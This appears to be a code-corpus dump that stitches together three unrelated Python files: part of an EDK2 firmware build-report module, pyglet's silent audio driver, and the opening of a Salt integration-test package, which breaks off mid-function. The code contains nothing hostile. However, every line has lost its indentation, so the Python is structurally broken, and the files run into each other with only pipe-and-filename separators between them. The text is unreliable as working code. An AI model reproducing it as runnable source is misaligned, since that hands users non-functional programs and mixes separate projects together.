# @param Wa Workspace context information
#
def __init__(self, Wa):
self._MapFileName = os.path.join(Wa.BuildDir, Wa.Name + ".map")
self._MapFileParsed = False
self._EotToolInvoked = False
self._FvDir = Wa.FvDir
self._EotDir = Wa.BuildDir
self._FfsEntryPoint = {}
self._GuidMap = {}
self._SourceList = []
self.FixedMapDict = {}
self.ItemList = []
self.MaxLen = 0
#
# Collect all platform reference source files and GUID C Name
#
for Pa in Wa.AutoGenObjectList:
for Module in Pa.LibraryAutoGenList + Pa.ModuleAutoGenList:
#
# BASE typed modules are EFI agnostic, so we need not scan
# their source code to find PPI/Protocol produce or consume
# information.
#
if Module.ModuleType == SUP_MODULE_BASE:
continue
#
# Add module referenced source files
#
self._SourceList.append(str(Module))
IncludeList = {}
for Source in Module.SourceFileList:
if os.path.splitext(str(Source))[1].lower() == ".c":
self._SourceList.append(" " + str(Source))
FindIncludeFiles(Source.Path, Module.IncludePathList, IncludeList)
for IncludeFile in IncludeList.values():
self._SourceList.append(" " + IncludeFile)
for Guid in Module.PpiList:
self._GuidMap[Guid] = GuidStructureStringToGuidString(Module.PpiList[Guid])
for Guid in Module.ProtocolList:
self._GuidMap[Guid] = GuidStructureStringToGuidString(Module.ProtocolList[Guid])
for Guid in Module.GuidList:
self._GuidMap[Guid] = GuidStructureStringToGuidString(Module.GuidList[Guid])
if Module.Guid and not Module.IsLibrary:
EntryPoint = " ".join(Module.Module.ModuleEntryPointList)
RealEntryPoint = "_ModuleEntryPoint"
self._FfsEntryPoint[Module.Guid.upper()] = (EntryPoint, RealEntryPoint)
#
# Collect platform firmware volume list as the input of EOT.
#
self._FvList = []
if Wa.FdfProfile:
for Fd in Wa.FdfProfile.FdDict:
for FdRegion in Wa.FdfProfile.FdDict[Fd].RegionList:
if FdRegion.RegionType != BINARY_FILE_TYPE_FV:
continue
for FvName in FdRegion.RegionDataList:
if FvName in self._FvList:
continue
self._FvList.append(FvName)
for Ffs in Wa.FdfProfile.FvDict[FvName.upper()].FfsList:
for Section in Ffs.SectionList:
try:
for FvSection in Section.SectionList:
if FvSection.FvName in self._FvList:
continue
self._FvList.append(FvSection.FvName)
except AttributeError:
pass
##
# Parse platform fixed address map files
#
# This function parses the platform final fixed address map file to get
# the database of predicted fixed address for module image base, entry point
# etc.
#
# @param self: The object pointer
#
def _ParseMapFile(self):
if self._MapFileParsed:
return
self._MapFileParsed = True
if os.path.isfile(self._MapFileName):
try:
FileContents = open(self._MapFileName).read()
for Match in gMapFileItemPattern.finditer(FileContents):
AddressType = Match.group(1)
BaseAddress = Match.group(2)
EntryPoint = Match.group(3)
Guid = Match.group(4).upper()
List = self.FixedMapDict.setdefault(Guid, [])
List.append((AddressType, BaseAddress, "*I"))
List.append((AddressType, EntryPoint, "*E"))
except:
EdkLogger.warn(None, "Cannot open file to read", self._MapFileName)
##
# Invokes EOT tool to get the predicted the execution order.
#
# This function invokes EOT tool to calculate the predicted dispatch order
#
# @param self: The object pointer
#
def _InvokeEotTool(self):
if self._EotToolInvoked:
return
self._EotToolInvoked = True
FvFileList = []
for FvName in self._FvList:
FvFile = os.path.join(self._FvDir, FvName + ".Fv")
if os.path.isfile(FvFile):
FvFileList.append(FvFile)
if len(FvFileList) == 0:
return
#
# Write source file list and GUID file list to an intermediate file
# as the input for EOT tool and dispatch List as the output file
# from EOT tool.
#
SourceList = os.path.join(self._EotDir, "SourceFile.txt")
GuidList = os.path.join(self._EotDir, "GuidList.txt")
DispatchList = os.path.join(self._EotDir, "Dispatch.txt")
TempFile = []
for Item in self._SourceList:
FileWrite(TempFile, Item)
SaveFileOnChange(SourceList, "".join(TempFile), False)
TempFile = []
for Key in self._GuidMap:
FileWrite(TempFile, "%s %s" % (Key, self._GuidMap[Key]))
SaveFileOnChange(GuidList, "".join(TempFile), False)
try:
from Eot.EotMain import Eot
#
# Invoke EOT tool and echo its runtime performance
#
EotStartTime = time.time()
Eot(CommandLineOption=False, SourceFileList=SourceList, GuidList=GuidList,
FvFileList=' '.join(FvFileList), Dispatch=DispatchList, IsInit=True)
EotEndTime = time.time()
EotDuration = time.strftime("%H:%M:%S", time.gmtime(int(round(EotEndTime - EotStartTime))))
EdkLogger.quiet("EOT run time: %s\n" % EotDuration)
#
# Parse the output of EOT tool
#
for Line in open(DispatchList):
if len(Line.split()) < 4:
continue
(Guid, Phase, FfsName, FilePath) = Line.split()
Symbol = self._FfsEntryPoint.get(Guid, [FfsName, ""])[0]
if len(Symbol) > self.MaxLen:
self.MaxLen = len(Symbol)
self.ItemList.append((Phase, Symbol, FilePath))
except:
EdkLogger.quiet("(Python %s on %s\n%s)" % (platform.python_version(), sys.platform, traceback.format_exc()))
EdkLogger.warn(None, "Failed to generate execution order prediction report, for some error occurred in executing EOT.")
##
# Generate platform execution order report
#
# This function generates the predicted module execution order.
#
# @param self The object pointer
# @param File The file object for report
#
def _GenerateExecutionOrderReport(self, File):
self._InvokeEotTool()
if len(self.ItemList) == 0:
return
FileWrite(File, gSectionStart)
FileWrite(File, "Execution Order Prediction")
FileWrite(File, "*P PEI phase")
FileWrite(File, "*D DXE phase")
FileWrite(File, "*E Module INF entry point name")
FileWrite(File, "*N Module notification function name")
FileWrite(File, "Type %-*s %s" % (self.MaxLen, "Symbol", "Module INF Path"))
FileWrite(File, gSectionSep)
for Item in self.ItemList:
FileWrite(File, "*%sE %-*s %s" % (Item[0], self.MaxLen, Item[1], Item[2]))
FileWrite(File, gSectionStart)
##
# Generate Fixed Address report.
#
# This function generate the predicted fixed address report for a module
# specified by Guid.
#
# @param self The object pointer
# @param File The file object for report
# @param Guid The module Guid value.
# @param NotifyList The list of all notify function in a module
#
def _GenerateFixedAddressReport(self, File, Guid, NotifyList):
self._ParseMapFile()
FixedAddressList = self.FixedMapDict.get(Guid)
if not FixedAddressList:
return
FileWrite(File, gSubSectionStart)
FileWrite(File, "Fixed Address Prediction")
FileWrite(File, "*I Image Loading Address")
FileWrite(File, "*E Entry Point Address")
FileWrite(File, "*N Notification Function Address")
FileWrite(File, "*F Flash Address")
FileWrite(File, "*M Memory Address")
FileWrite(File, "*S SMM RAM Offset")
FileWrite(File, "TOM Top of Memory")
FileWrite(File, "Type Address Name")
FileWrite(File, gSubSectionSep)
for Item in FixedAddressList:
Type = Item[0]
Value = Item[1]
Symbol = Item[2]
if Symbol == "*I":
Name = "(Image Base)"
elif Symbol == "*E":
Name = self._FfsEntryPoint.get(Guid, ["", "_ModuleEntryPoint"])[1]
elif Symbol in NotifyList:
Name = Symbol
Symbol = "*N"
else:
continue
if "Flash" in Type:
Symbol += "F"
elif "Memory" in Type:
Symbol += "M"
else:
Symbol += "S"
if Value[0] == "-":
Value = "TOM" + Value
FileWrite(File, "%s %-16s %s" % (Symbol, Value, Name))
##
# Generate report for the prediction part
#
# This function generate the predicted fixed address report for a module or
# predicted module execution order for a platform.
# If the input Guid is None, then, it generates the predicted module execution order;
# otherwise it generated the module fixed loading address for the module specified by
# Guid.
#
# @param self The object pointer
# @param File The file object for report
# @param Guid The module Guid value.
#
def GenerateReport(self, File, Guid):
if Guid:
self._GenerateFixedAddressReport(File, Guid.upper(), [])
else:
self._GenerateExecutionOrderReport(File)
##
# Reports FD region information
#
# This class reports the FD subsection in the build report file.
# It collects region information of platform flash device.
# If the region is a firmware volume, it lists the set of modules
# and its space information; otherwise, it only lists its region name,
# base address and size in its sub-section header.
# If there are nesting FVs, the nested FVs will list immediate after
# this FD region subsection
#
class FdRegionReport(object):
##
# Discover all the nested FV name list.
#
# This is an internal worker function to discover the all the nested FV information
# in the parent firmware volume. It uses deep first search algorithm recursively to
# find all the FV list name and append them to the list.
#
# @param self The object pointer
# @param FvName The name of current firmware file system
# @param Wa Workspace context information
#
def _DiscoverNestedFvList(self, FvName, Wa):
FvDictKey=FvName.upper()
if FvDictKey in Wa.FdfProfile.FvDict:
for Ffs in Wa.FdfProfile.FvDict[FvName.upper()].FfsList:
for Section in Ffs.SectionList:
try:
for FvSection in Section.SectionList:
if FvSection.FvName in self.FvList:
continue
self._GuidsDb[Ffs.NameGuid.upper()] = FvSection.FvName
self.FvList.append(FvSection.FvName)
self.FvInfo[FvSection.FvName] = ("Nested FV", 0, 0)
self._DiscoverNestedFvList(FvSection.FvName, Wa)
except AttributeError:
pass
##
# Constructor function for class FdRegionReport
#
# This constructor function generates FdRegionReport object for a specified FdRegion.
# If the FdRegion is a firmware volume, it will recursively find all its nested Firmware
# volume list. This function also collects GUID map in order to dump module identification
# in the final report.
#
# @param self: The object pointer
# @param FdRegion The current FdRegion object
# @param Wa Workspace context information
#
def __init__(self, FdRegion, Wa):
self.Type = FdRegion.RegionType
self.BaseAddress = FdRegion.Offset
self.Size = FdRegion.Size
self.FvList = []
self.FvInfo = {}
self._GuidsDb = {}
self._FvDir = Wa.FvDir
self._WorkspaceDir = Wa.WorkspaceDir
#
# If the input FdRegion is not a firmware volume,
# we are done.
#
if self.Type != BINARY_FILE_TYPE_FV:
return
#
# Find all nested FVs in the FdRegion
#
for FvName in FdRegion.RegionDataList:
if FvName in self.FvList:
continue
self.FvList.append(FvName)
self.FvInfo[FvName] = ("Fd Region", self.BaseAddress, self.Size)
self._DiscoverNestedFvList(FvName, Wa)
PlatformPcds = {}
#
# Collect PCDs declared in DEC files.
#
for Pa in Wa.AutoGenObjectList:
for Package in Pa.PackageList:
for (TokenCName, TokenSpaceGuidCName, DecType) in Package.Pcds:
DecDefaultValue = Package.Pcds[TokenCName, TokenSpaceGuidCName, DecType].DefaultValue
PlatformPcds[(TokenCName, TokenSpaceGuidCName)] = DecDefaultValue
#
# Collect PCDs defined in DSC file
#
for Pa in Wa.AutoGenObjectList:
for (TokenCName, TokenSpaceGuidCName) in Pa.Platform.Pcds:
DscDefaultValue = Pa.Platform.Pcds[(TokenCName, TokenSpaceGuidCName)].DefaultValue
PlatformPcds[(TokenCName, TokenSpaceGuidCName)] = DscDefaultValue
#
# Add PEI and DXE a priori files GUIDs defined in PI specification.
#
self._GuidsDb[PEI_APRIORI_GUID] = "PEI Apriori"
self._GuidsDb[DXE_APRIORI_GUID] = "DXE Apriori"
#
# Add ACPI table storage file
#
self._GuidsDb["7E374E25-8E01-4FEE-87F2-390C23C606CD"] = "ACPI table storage"
for Pa in Wa.AutoGenObjectList:
for ModuleKey in Pa.Platform.Modules:
M = Pa.Platform.Modules[ModuleKey].M
InfPath = mws.join(Wa.WorkspaceDir, M.MetaFile.File)
self._GuidsDb[M.Guid.upper()] = "%s (%s)" % (M.Module.BaseName, InfPath)
#
# Collect the GUID map in the FV firmware volume
#
for FvName in self.FvList:
FvDictKey=FvName.upper()
if FvDictKey in Wa.FdfProfile.FvDict:
for Ffs in Wa.FdfProfile.FvDict[FvName.upper()].FfsList:
try:
#
# collect GUID map for binary EFI file in FDF file.
#
Guid = Ffs.NameGuid.upper()
Match = gPcdGuidPattern.match(Ffs.NameGuid)
if Match:
PcdTokenspace = Match.group(1)
PcdToken = Match.group(2)
if (PcdToken, PcdTokenspace) in PlatformPcds:
GuidValue = PlatformPcds[(PcdToken, PcdTokenspace)]
Guid = GuidStructureByteArrayToGuidString(GuidValue).upper()
for Section in Ffs.SectionList:
try:
ModuleSectFile = mws.join(Wa.WorkspaceDir, Section.SectFileName)
self._GuidsDb[Guid] = ModuleSectFile
except AttributeError:
pass
except AttributeError:
pass
##
# Internal worker function to generate report for the FD region
#
# This internal worker function to generate report for the FD region.
# It the type is firmware volume, it lists offset and module identification.
#
# @param self The object pointer
# @param File The file object for report
# @param Title The title for the FD subsection
# @param BaseAddress The base address for the FD region
# @param Size The size of the FD region
# @param FvName The FV name if the FD region is a firmware volume
#
def _GenerateReport(self, File, Title, Type, BaseAddress, Size=0, FvName=None):
FileWrite(File, gSubSectionStart)
FileWrite(File, Title)
FileWrite(File, "Type: %s" % Type)
FileWrite(File, "Base Address: 0x%X" % BaseAddress)
if self.Type == BINARY_FILE_TYPE_FV:
FvTotalSize = 0
FvTakenSize = 0
FvFreeSize = 0
if FvName.upper().endswith('.FV'):
FileExt = FvName + ".txt"
else:
FileExt = FvName + ".Fv.txt"
if not os.path.isfile(FileExt):
FvReportFileName = mws.join(self._WorkspaceDir, FileExt)
if not os.path.isfile(FvReportFileName):
FvReportFileName = os.path.join(self._FvDir, FileExt)
try:
#
# Collect size info in the firmware volume.
#
FvReport = open(FvReportFileName).read()
Match = gFvTotalSizePattern.search(FvReport)
if Match:
FvTotalSize = int(Match.group(1), 16)
Match = gFvTakenSizePattern.search(FvReport)
if Match:
FvTakenSize = int(Match.group(1), 16)
FvFreeSize = FvTotalSize - FvTakenSize
#
# Write size information to the report file.
#
FileWrite(File, "Size: 0x%X (%.0fK)" % (FvTotalSize, FvTotalSize / 1024.0))
FileWrite(File, "Fv Name: %s (%.1f%% Full)" % (FvName, FvTakenSize * 100.0 / FvTotalSize))
FileWrite(File, "Occupied Size: 0x%X (%.0fK)" % (FvTakenSize, FvTakenSize / 1024.0))
FileWrite(File, "Free Size: 0x%X (%.0fK)" % (FvFreeSize, FvFreeSize / 1024.0))
FileWrite(File, "Offset Module")
FileWrite(File, gSubSectionSep)
#
# Write module offset and module identification to the report file.
#
OffsetInfo = {}
for Match in gOffsetGuidPattern.finditer(FvReport):
Guid = Match.group(2).upper()
OffsetInfo[Match.group(1)] = self._GuidsDb.get(Guid, Guid)
OffsetList = sorted(OffsetInfo.keys())
for Offset in OffsetList:
FileWrite (File, "%s %s" % (Offset, OffsetInfo[Offset]))
except IOError:
EdkLogger.warn(None, "Fail to read report file", FvReportFileName)
else:
FileWrite(File, "Size: 0x%X (%.0fK)" % (Size, Size / 1024.0))
FileWrite(File, gSubSectionEnd)
##
# Generate report for the FD region
#
# This function generates report for the FD region.
#
# @param self The object pointer
# @param File The file object for report
#
def GenerateReport(self, File):
if (len(self.FvList) > 0):
for FvItem in self.FvList:
Info = self.FvInfo[FvItem]
self._GenerateReport(File, Info[0], TAB_FV_DIRECTORY, Info[1], Info[2], FvItem)
else:
self._GenerateReport(File, "FD Region", self.Type, self.BaseAddress, self.Size)
##
# Reports FD information
#
# This class reports the FD section in the build report file.
# It collects flash device information for a platform.
#
class FdReport(object):
##
# Constructor function for class FdReport
#
# This constructor function generates FdReport object for a specified
# firmware device.
#
# @param self The object pointer
# @param Fd The current Firmware device object
# @param Wa Workspace context information
#
def __init__(self, Fd, Wa):
self.FdName = Fd.FdUiName
self.BaseAddress = Fd.BaseAddress
self.Size = Fd.Size
self.FdRegionList = [FdRegionReport(FdRegion, Wa) for FdRegion in Fd.RegionList]
self.FvPath = os.path.join(Wa.BuildDir, TAB_FV_DIRECTORY)
self.VPDBaseAddress = 0
self.VPDSize = 0
for index, FdRegion in enumerate(Fd.RegionList):
if str(FdRegion.RegionType) == 'FILE' and Wa.Platform.VpdToolGuid in str(FdRegion.RegionDataList):
self.VPDBaseAddress = self.FdRegionList[index].BaseAddress
self.VPDSize = self.FdRegionList[index].Size
break
##
# Generate report for the firmware device.
#
# This function generates report for the firmware device.
#
# @param self The object pointer
# @param File The file object for report
#
def GenerateReport(self, File):
FileWrite(File, gSectionStart)
FileWrite(File, "Firmware Device (FD)")
FileWrite(File, "FD Name: %s" % self.FdName)
FileWrite(File, "Base Address: %s" % self.BaseAddress)
FileWrite(File, "Size: 0x%X (%.0fK)" % (self.Size, self.Size / 1024.0))
if len(self.FdRegionList) > 0:
FileWrite(File, gSectionSep)
for FdRegionItem in self.FdRegionList:
FdRegionItem.GenerateReport(File)
if VPDPcdList:
VPDPcdList.sort(key=lambda x: int(x[2], 0))
FileWrite(File, gSubSectionStart)
FileWrite(File, "FD VPD Region")
FileWrite(File, "Base Address: 0x%X" % self.VPDBaseAddress)
FileWrite(File, "Size: 0x%X (%.0fK)" % (self.VPDSize, self.VPDSize / 1024.0))
FileWrite(File, gSubSectionSep)
for item in VPDPcdList:
# Add BaseAddress for offset
Offset = '0x%08X' % (int(item[2], 16) + self.VPDBaseAddress)
IsByteArray, ArrayList = ByteArrayForamt(item[-1])
Skuinfo = item[1]
if len(GlobalData.gSkuids) == 1 :
Skuinfo = GlobalData.gSkuids[0]
if IsByteArray:
FileWrite(File, "%s | %s | %s | %s | %s" % (item[0], Skuinfo, Offset, item[3], '{'))
for Array in ArrayList:
FileWrite(File, Array)
else:
FileWrite(File, "%s | %s | %s | %s | %s" % (item[0], Skuinfo, Offset, item[3], item[-1]))
FileWrite(File, gSubSectionEnd)
FileWrite(File, gSectionEnd)
##
# Reports platform information
#
# This class reports the whole platform information
#
class PlatformReport(object):
##
# Constructor function for class PlatformReport
#
# This constructor function generates PlatformReport object a platform build.
# It generates report for platform summary, flash, global PCDs and detailed
# module information for modules involved in platform build.
#
# @param self The object pointer
# @param Wa Workspace context information
# @param MaList The list of modules in the platform build
#
def __init__(self, Wa, MaList, ReportType):
self._WorkspaceDir = Wa.WorkspaceDir
self.PlatformName = Wa.Name
self.PlatformDscPath = Wa.Platform
self.Architectures = " ".join(Wa.ArchList)
self.ToolChain = Wa.ToolChain
self.Target = Wa.BuildTarget
self.OutputPath = os.path.join(Wa.WorkspaceDir, Wa.OutputDir)
self.BuildEnvironment = platform.platform()
self.PcdReport = None
if "PCD" in ReportType:
self.PcdReport = PcdReport(Wa)
self.FdReportList = []
if "FLASH" in ReportType and Wa.FdfProfile and MaList is None:
for Fd in Wa.FdfProfile.FdDict:
self.FdReportList.append(FdReport(Wa.FdfProfile.FdDict[Fd], Wa))
self.PredictionReport = None
if "FIXED_ADDRESS" in ReportType or "EXECUTION_ORDER" in ReportType:
self.PredictionReport = PredictionReport(Wa)
self.DepexParser = None
if "DEPEX" in ReportType:
self.DepexParser = DepexParser(Wa)
self.ModuleReportList = []
if MaList is not None:
self._IsModuleBuild = True
for Ma in MaList:
self.ModuleReportList.append(ModuleReport(Ma, ReportType))
else:
self._IsModuleBuild = False
for Pa in Wa.AutoGenObjectList:
ModuleAutoGenList = []
for ModuleKey in Pa.Platform.Modules:
ModuleAutoGenList.append(Pa.Platform.Modules[ModuleKey].M)
if GlobalData.gFdfParser is not None:
if Pa.Arch in GlobalData.gFdfParser.Profile.InfDict:
INFList = GlobalData.gFdfParser.Profile.InfDict[Pa.Arch]
for InfName in INFList:
InfClass = PathClass(NormPath(InfName), Wa.WorkspaceDir, Pa.Arch)
Ma = ModuleAutoGen(Wa, InfClass, Pa.BuildTarget, Pa.ToolChain, Pa.Arch, Wa.MetaFile, Pa.DataPipe)
if Ma is None:
continue
if Ma not in ModuleAutoGenList:
ModuleAutoGenList.append(Ma)
for MGen in ModuleAutoGenList:
self.ModuleReportList.append(ModuleReport(MGen, ReportType))
##
# Generate report for the whole platform.
#
# This function generates report for platform information.
# It comprises of platform summary, global PCD, flash and
# module list sections.
#
# @param self The object pointer
# @param File The file object for report
# @param BuildDuration The total time to build the modules
# @param AutoGenTime The total time of AutoGen Phase
# @param MakeTime The total time of Make Phase
# @param GenFdsTime The total time of GenFds Phase
# @param ReportType The kind of report items in the final report file
#
def GenerateReport(self, File, BuildDuration, AutoGenTime, MakeTime, GenFdsTime, ReportType):
FileWrite(File, "Platform Summary")
FileWrite(File, "Platform Name: %s" % self.PlatformName)
FileWrite(File, "Platform DSC Path: %s" % self.PlatformDscPath)
FileWrite(File, "Architectures: %s" % self.Architectures)
FileWrite(File, "Tool Chain: %s" % self.ToolChain)
FileWrite(File, "Target: %s" % self.Target)
if GlobalData.gSkuids:
FileWrite(File, "SKUID: %s" % " ".join(GlobalData.gSkuids))
if GlobalData.gDefaultStores:
FileWrite(File, "DefaultStore: %s" % " ".join(GlobalData.gDefaultStores))
FileWrite(File, "Output Path: %s" % self.OutputPath)
FileWrite(File, "Build Environment: %s" % self.BuildEnvironment)
FileWrite(File, "Build Duration: %s" % BuildDuration)
if AutoGenTime:
FileWrite(File, "AutoGen Duration: %s" % AutoGenTime)
if MakeTime:
FileWrite(File, "Make Duration: %s" % MakeTime)
if GenFdsTime:
FileWrite(File, "GenFds Duration: %s" % GenFdsTime)
FileWrite(File, "Report Content: %s" % ", ".join(ReportType))
if GlobalData.MixedPcd:
FileWrite(File, gSectionStart)
FileWrite(File, "The following PCDs use different access methods:")
FileWrite(File, gSectionSep)
for PcdItem in GlobalData.MixedPcd:
FileWrite(File, "%s.%s" % (str(PcdItem[1]), str(PcdItem[0])))
FileWrite(File, gSectionEnd)
if not self._IsModuleBuild:
if "PCD" in ReportType:
self.PcdReport.GenerateReport(File, None)
if "FLASH" in ReportType:
for FdReportListItem in self.FdReportList:
FdReportListItem.GenerateReport(File)
for ModuleReportItem in self.ModuleReportList:
ModuleReportItem.GenerateReport(File, self.PcdReport, self.PredictionReport, self.DepexParser, ReportType)
if not self._IsModuleBuild:
if "EXECUTION_ORDER" in ReportType:
self.PredictionReport.GenerateReport(File, None)
## BuildReport class
#
# This base class contain the routines to collect data and then
# applies certain format to the output report
#
class BuildReport(object):
##
# Constructor function for class BuildReport
#
# This constructor function generates BuildReport object a platform build.
# It generates report for platform summary, flash, global PCDs and detailed
# module information for modules involved in platform build.
#
# @param self The object pointer
# @param ReportFile The file name to save report file
# @param ReportType The kind of report items in the final report file
#
def __init__(self, ReportFile, ReportType):
self.ReportFile = ReportFile
if ReportFile:
self.ReportList = []
self.ReportType = []
if ReportType:
for ReportTypeItem in ReportType:
if ReportTypeItem not in self.ReportType:
self.ReportType.append(ReportTypeItem)
else:
self.ReportType = ["PCD", "LIBRARY", "BUILD_FLAGS", "DEPEX", "HASH", "FLASH", "FIXED_ADDRESS"]
##
# Adds platform report to the list
#
# This function adds a platform report to the final report list.
#
# @param self The object pointer
# @param Wa Workspace context information
# @param MaList The list of modules in the platform build
#
def AddPlatformReport(self, Wa, MaList=None):
if self.ReportFile:
self.ReportList.append((Wa, MaList))
##
# Generates the final report.
#
# This function generates platform build report. It invokes GenerateReport()
# method for every platform report in the list.
#
# @param self The object pointer
# @param BuildDuration The total time to build the modules
# @param AutoGenTime The total time of AutoGen phase
# @param MakeTime The total time of Make phase
# @param GenFdsTime The total time of GenFds phase
#
def GenerateReport(self, BuildDuration, AutoGenTime, MakeTime, GenFdsTime):
if self.ReportFile:
try:
File = []
for (Wa, MaList) in self.ReportList:
PlatformReport(Wa, MaList, self.ReportType).GenerateReport(File, BuildDuration, AutoGenTime, MakeTime, GenFdsTime, self.ReportType)
Content = FileLinesSplit(''.join(File), gLineMaxLength)
SaveFileOnChange(self.ReportFile, Content, False)
EdkLogger.quiet("Build report can be found at %s" % os.path.abspath(self.ReportFile))
except IOError:
EdkLogger.error(None, FILE_WRITE_FAILURE, ExtraData=self.ReportFile)
except:
EdkLogger.error("BuildReport", CODE_ERROR, "Unknown fatal error when generating build report", ExtraData=self.ReportFile, RaiseError=False)
EdkLogger.quiet("(Python %s on %s\n%s)" % (platform.python_version(), sys.platform, traceback.format_exc()))
# This acts like the main() function for the script, unless it is 'import'ed into another script.
if __name__ == '__main__':
pass
|
silent.py | #!/usr/bin/env python
'''
'''
__docformat__ = 'restructuredtext'
__version__ = '$Id$'
import time
from pyglet.media import AbstractAudioPlayer, AbstractAudioDriver, \
MediaThread, MediaEvent
import pyglet
_debug = pyglet.options['debug_media']
class SilentAudioPacket(object):
def __init__(self, timestamp, duration):
self.timestamp = timestamp
self.duration = duration
def consume(self, dt):
self.timestamp += dt
self.duration -= dt
class SilentAudioPlayerPacketConsumer(AbstractAudioPlayer):
# When playing video, length of audio (in secs) to buffer ahead.
_buffer_time = 0.4
# Minimum number of bytes to request from source
_min_update_bytes = 1024
# Maximum sleep time
_sleep_time = 0.2
def __init__(self, source_group, player):
super(SilentAudioPlayerPacketConsumer, self).__init__(source_group, player)
# System time of first timestamp
self._timestamp_time = None
# List of buffered SilentAudioPacket
self._packets = []
self._packets_duration = 0
self._events = []
# Actual play state.
self._playing = False
# TODO Be nice to avoid creating this thread if user doesn't care
# about EOS events and there's no video format.
# NOTE Use thread.condition as lock for all instance vars used by worker
self._thread = MediaThread(target=self._worker_func)
if source_group.audio_format:
self._thread.start()
def delete(self):
if _debug:
print 'SilentAudioPlayer.delete'
self._thread.stop()
def play(self):
if _debug:
print 'SilentAudioPlayer.play'
self._thread.condition.acquire()
if not self._playing:
self._playing = True
self._timestamp_time = time.time()
self._thread.condition.notify()
self._thread.condition.release()
def stop(self):
if _debug:
print 'SilentAudioPlayer.stop'
self._thread.condition.acquire()
if self._playing:
timestamp = self.get_time()
if self._packets:
packet = self._packets[0]
self._packets_duration -= timestamp - packet.timestamp
packet.consume(timestamp - packet.timestamp)
self._playing = False
self._thread.condition.release()
def clear(self):
if _debug:
print 'SilentAudioPlayer.clear'
self._thread.condition.acquire()
del self._packets[:]
self._packets_duration = 0
del self._events[:]
self._thread.condition.release()
def get_time(self):
if _debug:
print 'SilentAudioPlayer.get_time()'
self._thread.condition.acquire()
packets = self._packets
if self._playing:
# Consume timestamps
result = None
offset = time.time() - self._timestamp_time
while packets:
packet = packets[0]
if offset > packet.duration:
del packets[0]
self._timestamp_time += packet.duration
offset -= packet.duration
self._packets_duration -= packet.duration
else:
packet.consume(offset)
self._packets_duration -= offset
self._timestamp_time += offset
result = packet.timestamp
break
else:
# Paused
if packets:
result = packets[0].timestamp
else:
result = None
self._thread.condition.release()
if _debug:
print 'SilentAudioPlayer.get_time() -> ', result
return result
# Worker func that consumes audio data and dispatches events
def _worker_func(self):
thread = self._thread
#buffered_time = 0
eos = False
events = self._events
while True:
thread.condition.acquire()
if thread.stopped or (eos and not events):
thread.condition.release()
break
# Use up "buffered" audio based on amount of time passed.
timestamp = self.get_time()
if _debug:
print 'timestamp: %r' % timestamp
# Dispatch events
while events and timestamp is not None:
if (events[0].timestamp is None or
events[0].timestamp <= timestamp):
events[0]._sync_dispatch_to_player(self.player)
del events[0]
# Calculate how much data to request from source
secs = self._buffer_time - self._packets_duration
bytes = secs * self.source_group.audio_format.bytes_per_second
if _debug:
print 'Trying to buffer %d bytes (%r secs)' % (bytes, secs)
while bytes > self._min_update_bytes and not eos:
# Pull audio data from source
audio_data = self.source_group.get_audio_data(int(bytes))
if not audio_data and not eos:
events.append(MediaEvent(timestamp, 'on_eos'))
events.append(MediaEvent(timestamp, 'on_source_group_eos'))
eos = True
break
# Pretend to buffer audio data, collect events.
if self._playing and not self._packets:
self._timestamp_time = time.time()
self._packets.append(SilentAudioPacket(audio_data.timestamp,
audio_data.duration))
self._packets_duration += audio_data.duration
for event in audio_data.events:
event.timestamp += audio_data.timestamp
events.append(event)
events.extend(audio_data.events)
bytes -= audio_data.length
sleep_time = self._sleep_time
if not self._playing:
sleep_time = None
elif events and events[0].timestamp and timestamp:
sleep_time = min(sleep_time, events[0].timestamp - timestamp)
if _debug:
print 'SilentAudioPlayer(Worker).sleep', sleep_time
thread.sleep(sleep_time)
thread.condition.release()
class SilentTimeAudioPlayer(AbstractAudioPlayer):
# Note that when using this player (automatic if playing back video with
# unsupported audio codec) no events are dispatched (because they are
# normally encoded in the audio packet -- so no EOS events are delivered.
# This is a design flaw.
#
# Also, seeking is broken because the timestamps aren't synchronized with
# the source group.
_time = 0.0
_systime = None
def play(self):
self._systime = time.time()
def stop(self):
self._time = self.get_time()
self._systime = None
def delete(self):
pass
def clear(self):
pass
def get_time(self):
if self._systime is None:
return self._time
else:
return time.time() - self._systime + self._time
class SilentAudioDriver(AbstractAudioDriver):
def create_audio_player(self, source_group, player):
if source_group.audio_format:
return SilentAudioPlayerPacketConsumer(source_group, player)
else:
return SilentTimeAudioPlayer(source_group, player)
def create_audio_driver():
return SilentAudioDriver()
|
__init__.py | # -*- coding: utf-8 -*-
'''
Set up the Salt integration test suite
'''
# Import Python libs
from __future__ import absolute_import, print_function
import os
import re
import sys
import copy
import json
import time
import stat
import errno
import signal
import shutil
import pprint
import atexit
import socket
import logging
import tempfile
import threading
import subprocess
import multiprocessing
from datetime import datetime, timedelta
try:
import pwd
except ImportError:
pass
# Import salt tests support dirs
from tests.support.paths import * # pylint: disable=wildcard-import
from tests.support.processes import * # pylint: disable=wildcard-import
from tests.support.unit import TestCase
from tests.support.case import ShellTestCase
from tests.support.parser import PNUM, print_header, SaltTestcaseParser
from tests.support.helpers import requires_sshd_server, RedirectStdStreams
from tests.support.paths import ScriptPathMixin
from tests.support.mixins import CheckShellBinaryNameAndVersionMixin, ShellCaseCommonTestsMixin
from tests.support.mixins import AdaptedConfigurationTestCaseMixin, SaltClientTestCaseMixin
from tests.support.mixins import SaltMinionEventAssertsMixin, SaltReturnAssertsMixin
from tests.support.runtests import RUNTIME_VARS
# Import Salt libs
import salt
import salt.config
import salt.minion
import salt.runner
import salt.output
import salt.version
import salt.utils # Can be removed once get_colors and appendproctitle are moved
import salt.utils.files
import salt.utils.path
import salt.utils.platform
import salt.utils.process
import salt.utils.stringutils
import salt.log.setup as salt_log_setup
from salt.utils.verify import verify_env
from salt.utils.immutabletypes import freeze
from salt.utils.nb_popen import NonBlockingPopen
from salt.exceptions import SaltClientError
try:
import salt.master
except ImportError:
# Not required for raet tests
pass
# Import 3rd-party libs
import yaml
import msgpack
from salt.ext import six
from salt.ext.six.moves import cStringIO
try:
import salt.ext.six.moves.socketserver as socketserver
except ImportError:
import socketserver
from tornado import gen
from tornado import ioloop
# Import salt tests support libs
from tests.support.processes import SaltMaster, SaltMinion, SaltSyndic
log = logging.getLogger(__name__)
_RUNTESTS_PORTS = {}
def get_unused_localhost_port():
'''
Return a random unused port on localhost
'''
usock = socket.socket(family=socket.AF_INET, type=socket.SOCK_STREAM)
usock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
usock.bind(('127.0.0.1', 0))
port = usock.getsockname()[1]
if port in (54505, 54506, 64505, 64506, 64510, 64511, 64520, 64521):
# These ports are hardcoded in the test configuration
port = get_unused_localhost_port()
